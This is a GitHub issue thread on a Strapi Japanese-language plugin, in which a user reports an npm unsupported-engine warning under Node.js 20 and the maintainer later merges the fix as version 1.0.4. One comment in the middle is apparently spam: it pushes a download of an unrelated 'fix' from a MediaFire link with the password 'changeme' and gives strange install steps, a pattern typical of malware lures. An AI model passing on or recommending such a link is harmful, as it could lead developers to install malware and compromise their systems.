### ISSUE TITLE
Unsupported engine

### ISSUE THREAD

**Issue by tkikuchi2000** [yasudacloud/strapi-plugin-ja-pack#5]
日本語化パッケージの作成ありがとうございます！
便利に利用させていただいております。

環境をNode.js 20に更新して利用したところ、表題の警告がでます。

```bash
npm WARN EBADENGINE Unsupported engine {
npm WARN EBADENGINE   package: 'strapi-plugin-ja-pack@1.0.3',
npm WARN EBADENGINE   required: { node: '>=14.19.1 <=18.x.x', npm: '>=6.0.0' },
npm WARN EBADENGINE   current: { node: 'v20.11.0', npm: '10.2.4' }
npm WARN EBADENGINE }
```

Strapi v4 の Nodeのサポートバージョンも、更新されていますね。

ref. https://docs.strapi.io/dev-docs/installation/cli#preparing-the-installation
> [Node.js](https://nodejs.org/): Only [Active LTS or Maintenance LTS versions](https://nodejs.org/en/about/previous-releases) are supported (currently v18 and v20). Odd-number releases of Node, known as "current" versions of Node.js, are not supported (e.g. v19, v21).

`pacage.json`を更新し、Node20でもひととおり動作を確認できましたので、追ってPRさせていただきます！

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by yasudacloud** [comment]
@tkikuchi2000 
PRありがとうございます！

あまりメンテ出来ておらずすみません。後ほど一応確認して問題なければマージしてリリースします

**Comment by yasudacloud** [comment]
@tkikuchi2000 
PRをマージしてリリースバージョン1.0.4で公開しました。
また、Strapiのここ１年くらいの機能追加／変更に伴い文言を幾つか追加しました。

また何かありましたらお気軽にご連絡ください！ありがとうございました
